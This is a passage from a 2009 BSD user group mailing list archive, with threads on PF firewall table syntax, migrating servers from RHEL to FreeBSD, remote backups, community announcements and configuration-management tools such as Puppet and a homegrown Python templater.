From okan at demirmen.com Wed Mar 4 15:48:11 2009 From: okan at demirmen.com (Okan Demirmen) Date: Wed, 4 Mar 2009 15:48:11 -0500 Subject: [nycbug-talk] PF question: Can I make a const table made up of lists In-Reply-To: <49AED413.1060200@bad-apples.org> References: <49AED413.1060200@bad-apples.org> Message-ID: <20090304204811.GI27375@clam.khaoz.org> On Wed 2009.03.04 at 14:18 -0500, Mark Saad wrote: [snip] > table NETGROUP_ALL const { $NETGROUP_SJL $NETGROUP_LON $NETGROUP_EWR > $NETGROUP_HKG $NETGROUP_BACKUP } need <> around NETGROUP_ALL. [snip] > pass in quick on $ext_if inet proto tcp from NETGROUP_ALL to ($ext_if) > port 22 again, need <> around NETGROUP_ALL. From nonesuch at bad-apples.org Wed Mar 4 16:06:54 2009 From: nonesuch at bad-apples.org (Mark Saad) Date: Wed, 04 Mar 2009 16:06:54 -0500 Subject: [nycbug-talk] PF question: Can I make a const table made up of lists In-Reply-To: <20090304204811.GI27375@clam.khaoz.org> References: <49AED413.1060200@bad-apples.org> <20090304204811.GI27375@clam.khaoz.org> Message-ID: <49AEED6E.10305@bad-apples.org> Okan Wins !!! it was the pesky "<>" Okan Demirmen wrote: > On Wed 2009.03.04 at 14:18 -0500, Mark Saad wrote: > > [snip] > > >> table NETGROUP_ALL const { $NETGROUP_SJL $NETGROUP_LON $NETGROUP_EWR >> $NETGROUP_HKG $NETGROUP_BACKUP } >> > > need <> around NETGROUP_ALL. > > [snip] > > >> pass in quick on $ext_if inet proto tcp from NETGROUP_ALL to ($ext_if) >> port 22 >> > > again, need <> around NETGROUP_ALL. > _______________________________________________ > talk mailing list > talk at lists.nycbug.org > http://lists.nycbug.org/mailman/listinfo/talk > -- ]Mark Saad[ mark at bad-apples.org () ascii ribbon campaign - against html e-mail /\ www.asciiribbon.org - against proprietary attachments From akosela at andykosela.com Wed Mar 4 17:11:15 2009 From: akosela at andykosela.com (Andy Kosela) Date: Wed, 04 Mar 2009 23:11:15 +0100 Subject: [nycbug-talk] Searching for suspect PHP files... 
In-Reply-To: <49AEDAED.5020809@ceetonetechnology.com> References: <49ABF8E0.7070604@neuropunks.org> <49acf6bf.VcrnOm9Xl6wWmXiq%akosela@andykosela.com> <49ad985e.CV99hXLItnWIhTiS%akosela@andykosela.com> <49ADAE94.1020005@neuropunks.org> <49adb3aa.OaTRW0SW2rM6qQmA%akosela@andykosela.com> <49AEDAED.5020809@ceetonetechnology.com> Message-ID: <49aefc83.2/bqRx383NESjCiK%akosela@andykosela.com> George Rosamond wrote: > Miles Nordin wrote: > >>>>>> "mj" == Matt Juszczak writes: > > > > mj> say I wanted to check if an existing system of mine has > > mj> been compromised. > > > > I vote we should start using Vinge's word for this scenario: > > ``perverted''. Instead of ``the box has been compromised,'' say > > ``that machinery has become perverted.'' > > > > Instead of ``the worm is spreading through all our systems in that IP > > block really quickly,'' say ``the perversion is spreading throughout > > the entire cluster.'' > > This guy? > > http://en.wikipedia.org/wiki/Vernor_Vinge > Vernor Vinge is reminding me of Stanislaw Lem, author of Solaris. Both are/were very advanced in their ideas and thinking. --Andy From nikolai at fetissov.org Thu Mar 5 12:20:20 2009 From: nikolai at fetissov.org (nikolai) Date: Thu, 5 Mar 2009 12:20:20 -0500 (EST) Subject: [nycbug-talk] March 2009 meeting audio Message-ID: <95bf3ac3e02fb1bf8a257e46e420e035.squirrel@geekisp.com> Folks, Audio of Tom Limoncelli presentation is available at http://www.fetissov.org/public/nycbug/nycbug-03-04-09.mp3 Cheers, -- Nikolai From lists at stringsutils.com Thu Mar 5 17:28:27 2009 From: lists at stringsutils.com (Francisco Reyes) Date: Thu, 05 Mar 2009 17:28:27 -0500 Subject: [nycbug-talk] Remote backup services References: <28725454-1236123823-cardhu_decombobulator_blackberry.rim.net-218067971-@bxe1061.bisx.prod.on.blackberry> Message-ID: Raj Goel writes: Only works on *nix.... check http://tarsnap.com Using it on 4 machines with several more planned. If you do go with it... 
just remember to keep copies of the keys in separate machines. Otherwise if the machine dies, you loose all your data and will not be able to access the data on the service. Tarsnap is a service by Colin Percival the current FreeBSD security officer. From george at ceetonetechnology.com Fri Mar 6 00:55:38 2009 From: george at ceetonetechnology.com (George Rosamond) Date: Fri, 06 Mar 2009 00:55:38 -0500 Subject: [nycbug-talk] BSD Cert press release Message-ID: <49B0BADA.30809@ceetonetechnology.com> For anyone interested. . . * * * News and Announcements March 4, 2009 - Nominations Open for 3 Board of Directors Positions Press Release English Nominations Open for 3 Board of Directors Positions The BSD Certification Group will be accepting nominations for three Board of Directors positions starting March 4. These positions are for a two year term starting at the end of the election process. Nominees can be anyone from the general BSD community as well as any interested organization or company. The board of directors will be expanded to five members with Dru Lavigne and Jim Brown continuing their terms until 2010. Responsibilities may include participating in monthly meetings and helping set the direction of the BSD Certification Group. Nominations may be emailed until April 3, 2009. Please consider carbon copying the person being nominated on the email. (nominations at bsdcertification at org) The non-voting chair, Phil Nelson from the NetBSD community, will acknowledge receipt of each nomination and confirm the nominees. The names of the confirmed nominees along with the number of nominations received by each will be published by mid April. The eligible BSDCG members will hold an internal vote and the public announcement of the new Directors should be announced by mid May, 2009. For more details, see the BSDCG bylaws. 
(http://www.bsdcertification.org/BSDCG/bylaws.html) About the BSD Certification Group The BSD Certification Group (BSDCG) is a non-profit organization committed to creating and maintaining a global certification standard for system administration on BSD based operating systems. The BSDCG works with the BSD and sysadmin communities in order to provide a practical and relevant certification. From zippy1981 at gmail.com Fri Mar 6 03:07:55 2009 From: zippy1981 at gmail.com (Justin Dearing) Date: Fri, 6 Mar 2009 03:07:55 -0500 Subject: [nycbug-talk] Fwd: [Lilug] Next LUGSB Meeting, and LILUG Meeting with ESR! In-Reply-To: References: Message-ID: <5458db3c0903060007j3409fe68y88bb3d37f7e733f3@mail.gmail.com> Guys, ESR will be at Suny Farmingdale March 10th at 8pm. Regards, Justin Dearing ---------- Forwarded message ---------- From: Benjamin Kudria Date: Thu, Mar 5, 2009 at 3:09 AM Subject: [Lilug] Next LUGSB Meeting, and LILUG Meeting with ESR! To: Linux Users Group at Stony Brook , Jonathan Dahan , lilug at lilug.org Hi, all, Some announcements: The next LUGSB meeting will be next Thursday, the 12th, at 5:30 PM, in room 1441. Jonathan, our VP, will be giving a presentation: "Hacking the XBox with Linux", with a real live XBox in attendance. The flyer, as usual, can be found at [1] , and, as usual, help in posting it is greatly appreciated. I'd also like to let everyone know that LILUG [2], the Long Island LUG, is having a meeting on the 10th, at Farmingdale University (150 Whitman Hall), at 8PM. Eric S. Raymond [3], noted open source software advocate, will be speaking with the audience at the meeting. I'd like to organize a carpool to Farmingdale, I'll try to send out another email about that soon. I've also put together a poster for this event, at [4], posting it would also be a ... good thing. (Mandatory flyer posting guidelines: post on bulleting boards (or, walls), not on doors or windows. Thanks!) See you there! 
Benjamin Kudria LUGSB President 1: http://ben.kudria.net/pub/next-meeting-flyer.pdf 2: http://lilug.org 3: http://en.wikipedia.org/wiki/Eric_S_Raymond 4: http://ben.kudria.net/pub/lilug-esr-flyer.pdf -- http://ben.kudria.net | Jabber: ben at kudria.net _______________________________________________ Lilug mailing list Lilug at lilug.org http://lists.lilug.org/listinfo.cgi/lilug-lilug.org -------------- next part -------------- An HTML attachment was scrubbed... URL: From matt at atopia.net Fri Mar 6 11:19:00 2009 From: matt at atopia.net (Matt Juszczak) Date: Fri, 6 Mar 2009 11:19:00 -0500 (EST) Subject: [nycbug-talk] Switch to FreeBSD from RHEL Message-ID: I'm currently in the middle of a data center migration project and we're considering switching to my long time favorite OS, FreeBSD. Luckily, the higher ups are also FreeBSD fans, but its the higher ups of the higher ups that need convincing. While I personally feel that FreeBSD is superior in out of box security, ease of configuration (rc.conf file, etc.), packages (ports system / pkg_create vs. rpm), stability and performance, etc., my opinion is probably very biased. I just have a few things to ask everyone, and I'd be hoping for some documentation to back it up if possible. 1) FreeBSD vs. Linux - I passed on the single document linked on bsdjobs.net that outlines the differences between the two, but I was hoping for something more recent and solid. Any links? Like I said, I'm sold - it's convincing others. 2) Centralized management - the dream of starting from the ground up is here for me. I'd like to definitely use LDAP & SVN for centralized authentication and centralized code versioning. Also, internal DNS (not split horizon). In the possibilities but not yet finalized category include CF Engine (we'll need a way to centrally manage server config files and centrally updated servers - if you have alternatives to CF Engine, perhaps something that works better for a smaller (50 server) setup, let me know!). 
I'd also like to know how everyone does centralized authorization - still using LDAP, with groups, and sudo with roles, or something else?

3) Security Auditing - here's a big one, too. chkrootkit? mtree? Starting early on, I'd like to get a good security status impression of these 50 servers from day 1.

4) LAMP stack support with FreeBSD:

A) Apache - performance comparisons? In the past, I've seen a performance gain overall switching webs to FreeBSD from Linux. Does this still hold true with apache_2.x?

B) MySQL - In the past, I saw a performance *drop* when switching from Linux to FreeBSD. pthread support enabled helped, but at the time it was only available for 32-bit. Some recent documentation shows that FreeBSD 7.x with MySQL 5.0.x works well, while potentially 5.1.x may not. Does anyone have any comments on this one? (this is probably our largest fear). Of course, we'll do our own benchmarking before we move :) But these are just pre-planning questions.

C) PHP - any performance differences?

D) Memcache - any performance differences?

I'd say those are most of my questions for now. Thanks everyone!

-Matt

From skreuzer at exit2shell.com Fri Mar 6 12:08:16 2009
From: skreuzer at exit2shell.com (Steven Kreuzer)
Date: Fri, 6 Mar 2009 12:08:16 -0500
Subject: [nycbug-talk] Switch to FreeBSD from RHEL
Message-ID: <7211AF80-6E9A-4D76-B6BE-77421D717CFD@exit2shell.com>

On Mar 6, 2009, at 11:19 AM, Matt Juszczak wrote:

> I'm currently in the middle of a data center migration project and we're considering switching to my long time favorite OS, FreeBSD. Luckily, the higher ups are also FreeBSD fans, but it's the higher ups of the higher ups that need convincing.
>
> While I personally feel that FreeBSD is superior in out of box security, ease of configuration (rc.conf file, etc.), packages (ports system / pkg_create vs. rpm), stability and performance, etc., my opinion is probably very biased.
> I just have a few things to ask everyone, and I'd be hoping for some documentation to back it up if possible.
>
> 1) FreeBSD vs. Linux - I passed on the single document linked on bsdjobs.net that outlines the differences between the two, but I was hoping for something more recent and solid. Any links? Like I said, I'm sold - it's convincing others.

http://www.over-yonder.net/~fullermd/rants/bsd4linux/bsd4linux1.php

- SNIP -

> A) Apache - performance comparisons? In the past, I've seen a performance gain overall switching webs to FreeBSD from Linux. Does this still hold true with apache_2.x?

Take a look at accept_filter(9)

"The utility of accf_http is such that a server will not have to context switch several times before performing the initial parsing of the request. This effectively reduces the amount of required CPU utilization to handle incoming requests by keeping active processes in preforking servers such as Apache low and reducing the size of the file descriptor set that needs to be managed by interfaces such as select(), poll() or kevent() based servers."

For what it's worth, during the 90's porn boom, most of the sites hosting adult content ran FreeBSD because it was able to handle large amounts of traffic. However, getting web sites to scale depends on much more than the underlying operating system. It's something that I could talk about for hours without mentioning the OS once.

> B) MySQL - In the past, I saw a performance *drop* when switching from Linux to FreeBSD. pthread support enabled helped, but at the time it was only available for 32-bit. Some recent documentation shows that FreeBSD 7.x with MySQL 5.0.x works well, while potentially 5.1.x may not. Does anyone have any comments on this one? (this is probably our largest fear). Of course, we'll do our own benchmarking before we move :) But these are just pre-planning questions.
Check out http://people.freebsd.org/~kris/scaling/mysql.html

> C) PHP - any performance differences?

php on FreeBSD is just as painful as it is on Linux.

> D) Memcache - any performance differences?

Take a look at mdcached http://ivoras.sharanet.org/projects/mdcached.html

--
Steven Kreuzer
http://www.exit2shell.com/~skreuzer

From carton at Ivy.NET Fri Mar 6 14:17:46 2009
From: carton at Ivy.NET (Miles Nordin)
Date: Fri, 06 Mar 2009 14:17:46 -0500
Subject: [nycbug-talk] Switch to FreeBSD from RHEL
In-Reply-To: <7211AF80-6E9A-4D76-B6BE-77421D717CFD@exit2shell.com> (Steven Kreuzer's message of "Fri, 6 Mar 2009 12:08:16 -0500")
References: <7211AF80-6E9A-4D76-B6BE-77421D717CFD@exit2shell.com>

>>>>> "sk" == Steven Kreuzer writes:

sk> http://www.over-yonder.net/~fullermd/rants/bsd4linux/bsd4linux1.php

in: http://www.over-yonder.net/~fullermd/rants/bsd4linux/bsd4linux5.php

He is only sort of right about Linux release engineering. Bitkeeper was replaced by git pretty quickly I think, and it is not just git, there is procedure surrounding it.

First, there isn't a development branch with odd numbers any more, at least none that I ever hear of. Even in Linux 2.2/2.3 days most work was already happening on 2.2 and then getting forward-ported to 2.3 by diligent frustrated people, and now no one ever talks about odd branches, especially developers. All the work happens on mini-branches off the stable (even) trunk. So, depending on what you are working on, you'll have a stable kernel plus development bits for your area of interest. Also the even trunk is allowed to become unstable between releases, which is not true of BSD's stable branches.

Second, they are using git, which I think allows them to be extremely stingy with repository access compared to BSD. Almost nobody has it. But you can have local branches in git, so a read-only repository plus git works well with this stable-plus-a-few-development-bits.
I think it may actually be better than what BSD does for the developer, though for a sysadmin it's a disgusting mess because you usually do not have access to all these private git repositories spread all over the place---the only one who can see the true history of the development of a certain subsystem is the guy working on it in his local repository, unless you want to try to piece it together through the ``patch sets'' he spews to mailing lists, but these don't get tracked in the main git tree, just sort of spewed.

I think the private-branch thing is bad in that it tends to make people territorial about their code, BUT (1) bigger projects will have their own public git server so you CAN see their work-in-progress, though I'm not sure how easy it is to incorporate it into your kernel, because I've not learned how to do anything but download with git, and (2) honestly BSD has had *way* more problem with unproductive people remaining territorial about old, broken code when less skilled but vastly more productive people want to work on it, than Linux has, so the claim ``spread-out private repositories and stingy global git/cvs access makes people more territorial than generous cvs access'' doesn't really wash with history.

Third, an important part of Linux revision control is these patchsets they mail around. There is a special git command for generating patchsets in an acceptable form for email, and there is some kind of political procedure backed by code for tossing around these patches that I don't understand. I'm following a smaller project, the UBI/UBIfs/mtd project, because I want to figure out when they will support mtd partitions >2GB so I can (ab)use it for USB sticks. I can't figure out if they're emulating the Linux-kernel patchset political framework, or actually participating in it.

The criticism that things like 'ifconfig' (or 'ip' which is what they use on Linux instead of ifconfig) are not revision-controlled along with the kernel is fucking spot-on.
They are living out some bogus fantasy with all this basic housekeeping they want to ``leave up to'' the distributions, and they ought to knock it off.

That said, the Gentoo tree is something in which you can make a 'cut' like BSD. And it sort-of has branches, but not in the revision control software. They have 'keywords' in portage, so each package will have a stable 'x86' version and an unstable '~x86' version. You can build an entire system with '~x86' to get the newer, less-stable packages. When they're ready they'll mark a newer package as 'x86' and move it into the stable system. But what ~x86 does is fetch slightly newer tarballs and then build them. It doesn't give direct access to a revision control tree like BSD. It's a serious deficiency of Linux that there's such a barrier to getting from a binary on your system to a revision-controlled source tree used to build that binary. They need to find some way to keep their idea of ``distributions,'' but turn sourceforge/Savannah into one giant git repository from which all the distributions pull.

``the stricter separation of "base" vs "ports" in BSD, as well as the structure of the ports tree itself, make it easier to have multiple parallel versions of packages in BSD. Sometimes, it's even possible and easy to have multiple versions installed at the same time.''

Disagree, Gentoo handles this much better than pkgsrc/ports. But discussion of package management can't be Linux vs. BSD because Linux has so many different package managers. It needs to be Gentoo vs Centos/RHEL vs Ubuntu vs pkgsrc vs freebsd-ports vs openbsd-ports vs OpenSolaris/IPS, or else it gets confusing. My favorite so far is OpenBSD ports because they disallow USE flags and package ``options'' which I think are a disaster. But a real package management system needs the support of a sandbox/chroot/snapshotting-filesystem---I'd like to see that.
NetBSD has the right idea with their bulk builds of forcing packages to build in an environment that has only their declared dependencies available, but I think it could be much faster with a libc sandbox or kernel support. Also a good package system, which AFAIK doesn't exist yet, should be able to parallelize builds not with 'make -j2' but by looking for wide areas of the dependency graph and building separate packages independently. And finally it should be possible to do cross-builds using emulators, not using autoconf. Run most of the build inside the emulator, but have fancy wrappers that can break out of the emulator for running certain safe programs natively, like a C cross-compiler, gzip, nroff, u.s.w., but as far as the Makefile can tell it's running on a real MIPS CPU.

``If it's written reasonably portably, 95% or better of it will compile right off on any vaguely POSIX-compliant system.''

hah! yeah, sure, POSIX. Unless it happens to be a programming language (Java, DalvikRE, Haskell, Lisp, Erlang), an extremely large program with its own GUI widgets, module ABI's, reflection-layers (Firefox/Chrome, Xorg, Openoffice), heavily-subpackaged (Ruby, Perl, Python, Gnome, KDE, emacs), or is a web service held together by spit and duct tape (Zimbra, Socialtext) or anything else not written in C and thus *not POSIX* (slap!) such as CouchDB/H2, cvsup/git/hg/darcs. Then, you're in trouble.

In short, if the Linux app in question is a single-threaded forking TCP listener written in 1980 and building with GNU autoconf, fine for BSD, minimal effort. If it's anything remotely interesting, like any of the programs people like to run these days and spend most of their time using if the people in question are not boring ponderous dinosaurs, anything alive and interesting and not fossilized, then it will be a major undertaking to get it working on BSD if its developers are working on Linux.
He is so disastrously wrong on this point, and so harmful to anyone gullible enough to buy his POSIX crap, though it does not affect Matt since he is using only fossilized LAMP software. But please do not let yourself be trapped by this baloney in what ought to be an extremely exciting time for software, a real possibility at finally something post-Unix and still Free.

sk> For what it's worth, during the 90's porn boom, most of the sites hosting adult content ran FreeBSD because it was able to handle large amounts of traffic.

...heh. yeah but what do they run now? Linux, nginx, lighttpd?

sk> However, getting web sites to scale depends on much more than the underlying operating system. It's something that I could talk about for hours without mentioning the OS once.

k fair enough.

sk> Check out http://people.freebsd.org/~kris/scaling/mysql.html

impressive! so maybe the analog to the way BSD people always slam Linux for unfsd that they haven't used in 15 years, is Linux people slamming FreeBSD/mysql based on FreeBSD 6.x.

what's this about mysql 5.1, though? it's faster on Linux than BSD, or it's slower everywhere?

--
READ CAREFULLY. By reading this fortune, you agree, on behalf of your employer, to release me from all obligations and waivers arising from any and all NON-NEGOTIATED agreements, licenses, terms-of-service, shrinkwrap, clickwrap, browsewrap, confidentiality, non-disclosure, non-compete and acceptable use policies ("BOGUS AGREEMENTS") that I have entered into with your employer, its partners, licensors, agents and assigns, in perpetuity, without prejudice to my ongoing rights and privileges. You further represent that you have the authority to release me from any BOGUS AGREEMENTS on behalf of your employer.

From brian.gupta at gmail.com Sun Mar 8 00:33:29 2009
From: brian.gupta at gmail.com (Brian Gupta)
Date: Sun, 8 Mar 2009 00:33:29 -0500
Subject: [nycbug-talk] sun + ms
In-Reply-To: <4995C4F7.5020302@me.com>
References: <4995B3AE.5080808@ceetonetechnology.com> <4995C4F7.5020302@me.com>
Message-ID: <5b5090780903072133o1c06808dn2a7d86f852299b94@mail.gmail.com>

Sun and Microsoft just certified (again I might add) that Windows runs on Sun's x86 HW. Non event people. Windows is certified to run on every Tier 1 server vendor's x86 HW. The fact that Sun and Microsoft have been enemies in the past, I guess creates some sort of reality distortion.

Remember Microsoft makes money selling Software. (they don't care whose) Sun makes money selling HW. (And frankly they don't care what runs on it)

This deal goes back at least two years by the way, they are just banging the same drums again, to try and build up Sun's HW sales.

Now if Microsoft had announced a Sparc port that would be something.

Cheers,
Brian

On Fri, Feb 13, 2009 at 2:07 PM, Siobhan Lynch wrote:
> On 2/13/09 12:53 PM, George Rosamond wrote:
>> http://www.propelmg.com/suneast/x64/one-web.html
>>
>> This usually means something bad is going to happen soon.
>>
>> g
>
> I have friends within Sun, and I haven't heard a thing about this - it would have been all over the OpenSolaris community by now..
>
> Brian is more connected than I am, you hear anything Brian?
>
> -Trish

--
- Brian Gupta

New York City user groups calendar: http://nyc.brandorr.com/

From brian.gupta at gmail.com Sun Mar 8 00:36:29 2009
From: brian.gupta at gmail.com (Brian Gupta)
Date: Sun, 8 Mar 2009 00:36:29 -0500
Subject: [nycbug-talk] version control for config files
Message-ID: <5b5090780903072136m2e5a63ddl2281cdd7ddffaec2@mail.gmail.com>

I know you think it is overkill, but seriously take a look at puppet. (I'm biased here). Basically it lets you put all your configs on a central server and then use SVN/GIT/whatever to manage it.

I'd be willing to help you get started, and we have a puppet user group in NYC. (Although we would be open to expanding it to include cfengine, if there are enough cfengine folks around).

-Brian

On Thu, Feb 26, 2009 at 6:27 PM, Charles Sprickman wrote:
> Howdy,
>
> I think the subject pretty much sums it up - I'm sick of not tracking changes in /etc and /usr/local/etc. I want something that deals with file permissions and is relatively transparent.
>
> I've been googling around, but finding not much other than weird contortions based on CVS that make such huge disclaimers as "this of course does not work with symlinks" or "this of course does not maintain file ownership/permissions".
>
> cfengine and the like do more than I want...
>
> Any interesting ideas out there?
>
> The most I have to work with is perhaps a dozen servers, maybe almost that many jails.
>
> Thanks,
>
> Charles
>
> ___
> Charles Sprickman
> NetEng/SysAdmin
> Bway.net - New York's Best Internet - www.bway.net
> spork at bway.net - 212.655.9344

--
- Brian Gupta

New York City user groups calendar: http://nyc.brandorr.com/

From dave at donnerjack.com Sun Mar 8 00:59:56 2009
From: dave at donnerjack.com (David Lawson)
Date: Sun, 8 Mar 2009 00:59:56 -0500
Subject: [nycbug-talk] version control for config files
In-Reply-To: <5b5090780903072136m2e5a63ddl2281cdd7ddffaec2@mail.gmail.com>
References: <5b5090780903072136m2e5a63ddl2281cdd7ddffaec2@mail.gmail.com>
Message-ID: <4680D7E1-B216-4844-84FF-A513094B0C6F@donnerjack.com>

Puppet is a really good option for config management, I looked really seriously at it a while back and liked what I saw a lot, but I had two major problems with it. First, it's written in Ruby and I'm not a Ruby programmer, so that kind of bites if I wanted to extend it. Second, and nearly every configuration management system I've looked at suffers from this problem, there's a pretty serious bootstrap cost to implementing it. It's a reasonably complex system, it's non-trivial to understand how to make it do what you want it to do, and when you do get a good handle on it, converting all your systems to use it can be a pretty serious undertaking, depending on how many you have. At the time, I was looking at a couple hundred, with configurations drifted all over hell and gone, so that was a time sink I couldn't afford.

What I ended up doing is writing a stupid simple configuration manager in python, we call it ghetto-config in the office. I've actually been thinking about asking to open source it, I'll talk to my boss about it on Monday, but the basic concepts are simple, and it didn't take me more than an afternoon to implement a first cut.
Ghetto-config works as a very simple templating engine: you define a bunch of key value pairs, and you can use those keys in a file and have ghetto-config substitute in the appropriate value for you when it parses it. It also understands how to set file modes, create symlinks, manage owners and groups, and how to diff versions of a file if it's changed.

Basically, you assign each machine a unique ID of some sort at install time (or later, if you want), we used the MAC address of the interface that was used to PXE boot the machine for kickstart, but you could use hostname or whatever if that was easier. That serves as the unique identifier for the system. Ghetto-config takes that information and uses it to build a URL to fetch configuration information from a central HTTP server storing config data. It fetches the URL it builds and gets back a file in config parser syntax (basically an .ini file) with a couple special sections. The first section is includes, so it can include other config parser syntax files. The second is definitions, which allows you to set up key-value pairs, like $eth0-ip$ = 192.168.1.15, and the third is a set of managed file sections.

Each managed file section gives the URL to fetch the template from (so you can use the same template file for multiple machines by just pointing to the URL of a canonical version) and the location on the file system to write the rendered template to once the substitutions have been performed. It optionally includes a file mode, owner, group, and the location of a symlink to make to the file location.

There's some additional detail in structuring the central config server and doing some other stuff that makes it simpler to manage, but that's the gist of it. It's about two hundred lines of python, it supports doing diffs between the central configuration and the local reality for any attribute it understands (so file contents, owner, group, mode, etc.) as well as a programmatic mode intended to be run from cron that'll tell you whether anything has changed on the machine so you can make sure none of your machines have drifted nightly, etc. We've started checking the central config tree into SVN so we have an audit trail of who did what to what file.

Does it do everything puppet does? God no. Does it do everything cfengine does? Again, god no. It's an 80/20 solution, it took me an afternoon to write the first version of it, and maybe a week of total development time to get it doing what it does and full test coverage for it. It happily manages several hundred machines, it makes installing and provisioning a new machine a thirty second job instead of a half hour or so, and it makes managing software installs over multiple machines much, much easier and more deterministic.

Like I said, I've been planning on asking about open sourcing it anyway, but if I don't get to do that, I'll be happy to answer questions or give pointers where I can.

--Dave

On Mar 8, 2009, at 12:36 AM, Brian Gupta wrote:

> I know you think it is overkill, but seriously take a look at puppet. (I'm biased here). Basically it lets you put all your configs on a central server and then use SVN/GIT/whatever to manage it.
>
> I'd be willing to help you get started, and we have a puppet user group in NYC. (Although we would be open to expanding it to include cfengine, if there are enough cfengine folks around).
>
> -Brian
>
> On Thu, Feb 26, 2009 at 6:27 PM, Charles Sprickman wrote:
>> Howdy,
>>
>> I think the subject pretty much sums it up - I'm sick of not tracking changes in /etc and /usr/local/etc. I want something that deals with file permissions and is relatively transparent.
>>
>> I've been googling around, but finding not much other than weird contortions based on CVS that make such huge disclaimers as "this of course does not work with symlinks" or "this of course does not maintain file ownership/permissions".
>>
>> cfengine and the like do more than I want...
>>
>> Any interesting ideas out there?
>>
>> The most I have to work with is perhaps a dozen servers, maybe almost that many jails.
>>
>> Thanks,
>>
>> Charles
>>
>> ___
>> Charles Sprickman
>> NetEng/SysAdmin
>> Bway.net - New York's Best Internet - www.bway.net
>> spork at bway.net - 212.655.9344
>
> --
> - Brian Gupta
>
> New York City user groups calendar: http://nyc.brandorr.com/

From ike at lesmuug.org Sun Mar 8 01:20:38 2009
From: ike at lesmuug.org (Isaac Levy)
Date: Sun, 8 Mar 2009 01:20:38 -0500
Subject: [nycbug-talk] version control for config files
In-Reply-To: <4680D7E1-B216-4844-84FF-A513094B0C6F@donnerjack.com>
References: <5b5090780903072136m2e5a63ddl2281cdd7ddffaec2@mail.gmail.com> <4680D7E1-B216-4844-84FF-A513094B0C6F@donnerjack.com>
Message-ID: <861DB338-3985-43A5-9A06-54333D245410@lesmuug.org>

On Mar 8, 2009, at 12:59 AM, David Lawson wrote:

> Puppet is a really good option for config management, I looked really seriously at it a while back and liked what I saw a lot, but I had two major problems with it. First, it's written in Ruby and I'm not a Ruby programmer, so that kind of bites if I wanted to extend it. Second, and nearly every configuration management system I've looked at suffers from this problem, there's a pretty serious bootstrap cost to implementing it. It's a reasonably complex system, it's non-trivial to understand how to make it do what you want it to do, and when you do get a good handle on it, converting all your systems to use it can be a pretty serious undertaking, depending on how many you have.
At the time, I was looking at a couple hundred, with > configurations drifted all over hell and gone, so that was a time sink > I couldn't afford. > > What I ended up doing is writing a stupid simple configuration manager > in python, we call it ghetto-config in the office. I've actually been > thinking about asking to open source it, I'll talk to my boss about it > on Monday, but the basic concepts are simple, and it didn't take me > more than an afternoon to implement a first cut. > > Ghetto-config works as a very simple templating engine, you define a > number bunch of key value pairs, and you can use those keys in a file > and have ghetto-config substitute in the appropriate value for you > when it parses it. It also understands how to set file modes, create > symlinks, manage owners and groups, and how to diff version of a file > if it's changed. > > Basically, you assign each machine a unique ID of some sort at install > time (or later, if you want), we used the MAC address of the interface > that was used to PXE boot the machine for kickstart, but you could use > hostname or whatever if that was easier. That serves as the unique > identifier for the system. Ghetto-config takes that information and > uses it to build a URL to fetch configuration information from a > central HTTP server storing config data. It fetches the URL it builds > and gets back a file in config parser syntax (basically an .ini file) > with a couple special sections. The first section is includes, so it > can include in other config parser syntax files. The second is > definitions, it allows to set up key-value pairs, like $eth0-ip$ = > 192.168.1.15, and the third set of managed file sections. 
> > Each managed file section gives the URL to fetch the template from (so > you can use the same template file for multiple machines by just > pointing to the URL of a canonical version) and the location on the > file system to write the rendered template to once the substitutions > have been performed. It optionally includes a file mode, owner, > group, and the location of a symlink to make to the file location. > > There's some additional detail in structuring the central config > server and doing some other stuff that makes it simpler to manage, but > that's the gist of it. It's about two hundred lines of python, it > supports doing diffs between the central configuration and the local > reality for any attribute it understands (so file contents, owner, > group, mode, etc.) as well as a programmatic mode intended to be run > from cron that'll tell you whether anything has changed on the machine > so you can make sure none of your machines have drifted nightly, etc. > We've started checking the central config tree into SVN so we have an > audit trail of who did what to what file. > > Does it do everything puppet does? God no. Does it do everything > cfengine does? Again, god no. It's an 80/20 solution, it took me an > afternoon to write the first version of it, and maybe a week of total > development time to get it doing what it does and full test coverage > for it. It happily manages several hundred machines, it makes > installing and provisioning a new machine a thirty second job instead > of a half hour or so, and it makes managing software installs over > multiple machines much, much easier and more deterministic. > > Like I said, I've been planning on asking about open sourcing it > anyway, but if I don't get to do that, I'll be happy to answer > questions or give pointers where I can. 
> > --Dave This sounds hot- I wanna try it :) Rocket- .ike From spork at bway.net Sun Mar 8 01:32:41 2009 From: spork at bway.net (Charles Sprickman) Date: Sun, 8 Mar 2009 01:32:41 -0500 (EST) Subject: [nycbug-talk] version control for config files In-Reply-To: <861DB338-3985-43A5-9A06-54333D245410@lesmuug.org> References: <5b5090780903072136m2e5a63ddl2281cdd7ddffaec2@mail.gmail.com> <4680D7E1-B216-4844-84FF-A513094B0C6F@donnerjack.com> <861DB338-3985-43A5-9A06-54333D245410@lesmuug.org> Message-ID: On Sun, 8 Mar 2009, Isaac Levy wrote: > On Mar 8, 2009, at 12:59 AM, David Lawson wrote: > >> Puppet is a really good option for config management, I looked really >> seriously at it a while back and liked what I saw a lot, but I had two >> major problems with it. First, it's written in Ruby and I'm not a >> Ruby programmer, so that kind of bites if I wanted to extend it. >> Second, and nearly every configuration management system I've looked >> at suffers from this problem, there's a pretty serious bootstrap cost >> to implementing it. It's a reasonably complex system, it's non- >> trivial to understand how to make it do what you want it to do, and >> when you do get a good handle on it, converting all your systems to >> use it can be a pretty serious undertaking, depending on how many you >> have. At the time, I was looking at a couple hundred, with >> configurations drifted all over hell and gone, so that was a time sink >> I couldn't afford. >> >> What I ended up doing is writing a stupid simple configuration manager >> in python, we call it ghetto-config in the office. I've actually been >> thinking about asking to open source it, I'll talk to my boss about it >> on Monday, but the basic concepts are simple, and it didn't take me >> more than an afternoon to implement a first cut. 
>> >> Ghetto-config works as a very simple templating engine, you define a >> number bunch of key value pairs, and you can use those keys in a file >> and have ghetto-config substitute in the appropriate value for you >> when it parses it. It also understands how to set file modes, create >> symlinks, manage owners and groups, and how to diff version of a file >> if it's changed. >> >> Basically, you assign each machine a unique ID of some sort at install >> time (or later, if you want), we used the MAC address of the interface >> that was used to PXE boot the machine for kickstart, but you could use >> hostname or whatever if that was easier. That serves as the unique >> identifier for the system. Ghetto-config takes that information and >> uses it to build a URL to fetch configuration information from a >> central HTTP server storing config data. It fetches the URL it builds >> and gets back a file in config parser syntax (basically an .ini file) >> with a couple special sections. The first section is includes, so it >> can include in other config parser syntax files. The second is >> definitions, it allows to set up key-value pairs, like $eth0-ip$ = >> 192.168.1.15, and the third set of managed file sections. >> >> Each managed file section gives the URL to fetch the template from (so >> you can use the same template file for multiple machines by just >> pointing to the 